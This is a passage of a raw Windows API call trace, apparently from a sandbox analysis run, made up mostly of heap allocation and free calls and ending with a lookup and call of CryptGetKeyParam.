0x9c2768 [0178.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0178.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0178.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0178.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0178.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0178.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0178.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0178.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.310] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0178.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0178.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0178.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0178.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0178.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0178.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0178.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0178.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0178.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0178.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0178.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0178.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0178.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0178.311] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0178.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0178.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0178.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0178.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0178.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0178.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0178.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0178.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0178.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0178.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0178.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0178.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0178.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0178.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0178.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0178.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0178.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0178.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0178.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.312] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0178.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0178.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0178.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0178.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0178.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0178.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0178.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0178.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0178.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0178.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0178.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0178.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0178.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0178.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0178.313] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0178.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0178.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0178.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0178.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0178.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0178.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0178.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0178.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0178.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0178.313] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0178.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0178.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd558 [0178.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0178.314] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0178.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0178.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0178.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0178.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0178.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0178.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0178.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0178.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0178.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0178.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0178.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0178.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0178.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0178.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0178.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0178.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0178.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0178.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0178.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0178.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0178.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0178.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0178.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0178.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0178.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0178.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0178.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0178.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0178.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0178.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0178.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0178.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0178.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0178.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0178.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0178.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0178.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0178.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0178.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0178.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0178.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0178.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0178.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0178.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0178.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0178.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0178.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0178.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0178.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0178.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0178.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0178.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0178.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0178.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0178.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0178.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0178.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0178.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0178.318] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0178.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0178.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0178.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.320] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0178.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0178.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0178.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0178.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0178.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0178.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0178.320] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c28a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0178.320] HeapFree (in: 